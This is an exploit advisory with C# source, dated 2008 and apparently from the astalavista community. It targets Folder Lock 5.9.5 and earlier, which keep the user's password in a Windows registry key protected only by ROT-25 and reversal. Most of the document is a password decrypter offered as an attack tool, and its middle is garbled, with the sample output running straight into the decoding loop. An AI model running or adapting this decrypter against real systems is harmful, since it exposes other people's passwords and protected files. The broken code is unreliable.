/* * Folder Lock <= 5.9.5 Local Password Information Disclosure * * Author(s): Charalambous Glafkos * George Nicolaou * Date: June 19, 2008 * Site: http://www.astalavista.com * Mail: glafkos@astalavista.com * ishtus@astalavista.com * * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability. * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks. * The security issue is caused due to the application storing access credentials within the Windows registry key: * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption. * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed. * * Sample Output: * * ASTALAVISTA the hacking & security community * Folder Lock <= 5.9.5 Decrypter v2.0 * --------------------------------- * Encrypted Password: :3= 65 && thisInt <= 91) { thisInt += 25; if (thisInt >= 91) { thisInt -= 26; } } if (thisInt >= 92 && thisInt <= 96) { thisInt += 25; if (thisInt >= 96) { thisInt -= 26; } } if (thisInt >= 32 && thisInt <= 47) { thisInt += 25; if (thisInt >= 47) { thisInt -= 26; } } if (thisInt >= 48 && thisInt <= 57) { thisInt += 25; if (thisInt >= 57) { thisInt -= 26; } } if (thisInt >= 58 && thisInt <= 64) { thisInt += 25; if (thisInt >= 64) { thisInt -= 26; } } if (thisInt >= 97 && thisInt <= 123) { thisInt += 25; if (thisInt >= 123) { thisInt -= 26; } } charArray[i] = (char)thisInt; } return new string(charArray); } } } Best Regards, Charalambous Glafkos ( nowayout ) __________________________________________ ASTALAVISTA - the hacking & security community www.astalavista.com www.astalavista.net